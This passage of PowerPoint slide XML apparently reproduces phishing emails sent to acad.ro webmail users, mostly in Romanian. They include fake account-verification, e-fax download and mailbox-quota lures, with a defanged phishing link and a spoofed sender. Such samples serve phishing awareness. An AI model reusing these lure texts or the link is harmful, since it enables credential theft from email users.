            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="3B3F44"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="3B3F44"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Linkul va expira în 24 de ore.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="3B3F44"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dacă nu ați parcurs acești pași până la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="3B3F44"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>13.05.2023</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="3B3F44"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, unele dintre funcțiile contului dvs. vor fi limitate.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7138416" y="2603460"/>
            <a:ext cx="4425696" cy="3323987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>Stimate utilizator webmail</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>În prezent, actualizăm serviciul nostru de e-mail pentru anul 2023, o performanță bună și toate conturile de e-mail inactive vor fi șterse în proces din cauza virusului.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pentru a evita închiderea contului dvs. în baza noastră de date, aveți la dispoziție 7 zile pentru a vă verifica contul de e-mail.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pentru verificare, faceți clic pe link:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>https : // shdygalzxez . mystrikingly . com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Confirmați / actualizați datele de conectare Webmail.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vă mulțumim că utilizați serviciile noastre!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cu sinceritate</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Departamentul IT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Flowchart: Process 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858000" y="1943099"/>
            <a:ext cx="4858512"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97791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644969934"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1080897" y="2194116"/>
          <a:ext cx="4033647" cy="2482406"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4033647">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1650"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>Dear </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050">
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>user</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                      </a:br>
                      <a:br>
                        <a:rPr lang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>You have received a 2 page(s) document via acad.ro email fax  </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                      </a:br>
                      <a:br>
                        <a:rPr lang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>Click Download Document To View Your Fax Documents Online.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                      </a:br>
                      <a:br>
                        <a:rPr lang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>Number Of Pages:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>  2 page(s) </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>Date Sent:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t> 3/31/2023 4:35:34 p.m.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>Sent To: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>user@acad.ro</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>Reference:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>  New_Order_202328031048.pdf </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="171450" marB="171450">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sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Flowchart: Process 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="435864" y="1943099"/>
            <a:ext cx="527608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(8)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Table 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6193536" y="1838135"/>
          <a:ext cx="5254752" cy="3537184"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5254752">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="364578">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="186009" marR="186009" marT="186009" marB="0" anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="178569">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Aveți (13) mesaje de e-mail noi în așteptare </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1249980">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Ați depășit cota de e-mail permisă pentru contul dvs. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" u="sng">
                          <a:solidFill>
                            <a:srgbClr val="0070C0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>user@acad.ro.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Cum să o rezolvi:</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1200">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Vă rugăm să verificați că sunteți un om și nu un robot, urmând linkul de mai jos, astfel încât să puteți prelua mesajele de e-mail în așteptare</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1200">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="178569">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1">
                          <a:effectLst/>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Verificați contul de e-mail</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1552555">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>  </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" i="1">
                          <a:effectLst/>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Dacă nu vă verificați contul de e-mail, este posibil să încetați să primiți e-mailuri</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1200">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Mesaj de e-mail trimis către: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" u="sng">
                          <a:solidFill>
                            <a:srgbClr val="0070C0"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>user@acad.ro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>  </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1200" b="1">
                          <a:effectLst/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Administrator cutie poștală (c)2023</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="229411" marR="0" marT="0" marB="124006" anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>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93366954"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6394703" y="5228146"/>
          <a:ext cx="4271391" cy="243840"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4271391">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Download Document</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600">
                        <a:solidFill>
                          <a:srgbClr val="C00000"/>
                        </a:solidFill>
                        <a:effectLst/>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6418533" y="5505323"/>
          <a:ext cx="2162904" cy="695325"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2162904">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="695325">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:br>
                        <a:rPr lang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>©2023 acad.ro Efax  </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:br>
                        <a:rPr lang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050">
                          <a:solidFill>
                            <a:srgbClr val="0070C0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Unsubscribe Here</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US">
                        <a:effectLst/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7499985" y="824335"/>
            <a:ext cx="339966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100" b="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>From:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> acad.ro [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>mailto:info @ landasolutions . com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
